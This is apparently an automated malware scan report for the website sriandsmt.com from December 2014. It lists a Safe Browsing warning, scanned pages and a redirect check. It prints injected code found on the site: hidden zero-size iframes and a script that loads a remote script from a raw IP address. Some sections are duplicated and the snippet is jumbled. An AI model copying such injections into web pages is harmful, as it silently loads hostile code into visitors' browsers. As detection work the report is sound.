Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sriandsmt.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sriandsmt.com/ | 200 OK Content-Length: 10018 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://xxxporno-video.blogspot.com <iframe name="byagresif" src="http://xxxporno-video.blogspot.com" width="0" height="0" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"> Hidden iFrame found. size: 0x0 src: http://xxxvideo-izle.blogspot.com <iframe name="byagresif" src="http://xxxvideo-izle.blogspot.com" width="0" height="0" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"> | ||
http://sriandsmt.com/script/script.js | 200 OK Content-Length: 3071 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function invchdetect(str) { var tr=true; var s=str.length; if(s==0) { return true; } else { for(i=0;i<s;i++) { if(str.charCodeAt(i)<48||str.charCodeAt(i)>57&&str.charCodeAt(i)<65||str.charCodeAt(i)>90&&str.charCodeAt(i)<97||str.charCodeAt(i)>122) { tr=false; break; } } if(tr==false) {return false; } else {return tr document.write('<script src=http://219.94.157.202/testtestesttest/newface.php ><\/script>'); document.write('<script src=http://219.94.157.202/testtestesttest/newface.php ><\/script>'); document.write('<script src=http://219.94.157.202/testtestesttest/newface.php ><\/script>'); document.write('<script src=http://219.94.157.202/testtestesttest/newface.php ><\/script>'); Antivirus reports:
| ||
http://sriandsmt.com/addprofile.php | 200 OK Content-Length: 65250 Content-Type: text/html | clean |
http://sriandsmt.com/../p_exporters.asp | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://sriandsmt.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Dec 2014 00:20:07 GMT Location: http://www.fastwebhost.com/404error.htm Server: Apache Content-Length: 223 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fastwebhost.com/404error.htm | 200 OK Content-Length: 1979 Content-Type: text/html | clean |
http://www.fastwebhost.com/ | 200 OK Content-Length: 16367 Content-Type: text/html | clean |
http://www.fastwebhost.com/js/jquery.min.js | 200 OK Content-Length: 85260 Content-Type: application/javascript | clean |
http://www.fastwebhost.com/js/slides.min.jquery.js | 200 OK Content-Length: 6784 Content-Type: application/javascript | clean |
http://www.fastwebhost.com/js/rollover.js | 200 OK Content-Length: 1064 Content-Type: application/javascript | clean |
http://www.fastwebhost.com/js/chrome.js | 200 OK Content-Length: 6395 Content-Type: application/javascript | clean |
http://www.fastwebhost.com/unlimited-web-hosting.html | 200 OK Content-Length: 32325 Content-Type: text/html | clean |
http://www.fastwebhost.com/windows-web-hosting.html | 200 OK Content-Length: 31898 Content-Type: text/html | clean |
http://www.fastwebhost.com/reseller-hosting.html | 200 OK Content-Length: 23644 Content-Type: text/html | clean |
http://www.fastwebhost.com/windows-reseller.html | 200 OK Content-Length: 25676 Content-Type: text/html | clean |
https://www.fastwebhost.com/clients/pwreset.php | 200 OK Content-Length: 11331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sriandsmt.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sun, 28 Dec 2014 00:20:05 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2fa077542e95ccfaf6393e3690a03b80; path=/
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: sriandsmt.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sun, 28 Dec 2014 00:20:05 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2fa077542e95ccfaf6393e3690a03b80; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: sriandsmt.com
Referer: http://www.google.com/search?q=sriandsmt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sriandsmt.com
Referer: http://www.google.com/search?q=sriandsmt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.